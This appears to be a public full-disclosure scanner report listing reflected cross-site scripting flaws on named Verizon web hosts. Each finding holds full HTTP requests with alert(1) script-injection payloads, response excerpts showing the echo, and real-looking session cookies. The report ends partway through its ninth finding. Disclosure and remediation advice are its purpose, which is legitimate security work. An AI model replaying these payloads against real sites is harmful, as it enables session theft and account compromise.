Current Research | Full Disclosure | As of March 14, 2011

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www22.business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b92a(a)3fb18037f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal2b92a(a)3fb18037f68/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=3Wv1Mn7dQ3C2rWTzcFFqCm50vMk5HvpjbhG9JWDGq3vsWv8NptVn!-2072702529; path=/

Resource /SMBPortal2b92a(a)3fb18037f68/smb could not be resolved for locale null.

1.2. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www22.business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b793e(a)11cbe181d16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbb793e(a)11cbe181d16?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=RQNpMn7dCvNNTPY5T5Hy0PGmqJrhpX4vKCMRrnr7kQRgpSVl5sy3!-1644393018; path=/

Resource /SMBPortal/smbb793e(a)11cbe181d16 could not be resolved for locale null.

1.3. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ba5'-alert(1)-'185cc5084d0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6BFkMn7cQlKLsvfzxSGcmYJpLqLvp8BpnKlLwn40STNYtD5rY6v1!1950273172; path=/
Content-Length: 112566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
aderText");

       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");

       var f_pageDefLabel = 'SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }

   onload = focusIt;
   // end WR 61703

</script>
...[SNIP]...

1.4. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA14V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:54:22 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=85ff4439-03f7-4614-a14f-6076686da86b; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6cf45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 00:59:22 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4" name="target">
...[SNIP]...

1.5. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:55:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target">
...[SNIP]...

1.6. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A02V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Sat, 20 Nov 2010 00:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:50 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target">
...[SNIP]...

1.7. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a916'-alert(1)-'a4883ee17a5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CP=null*; myservices=vzdock=N; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:14:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:42 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:19:42 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133609

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
ipt">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();
}
...[SNIP]...

1.8. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc9f'-alert(1)-'ea90d6efe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:13:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:50 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:18:50 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133536

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

1.9. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.

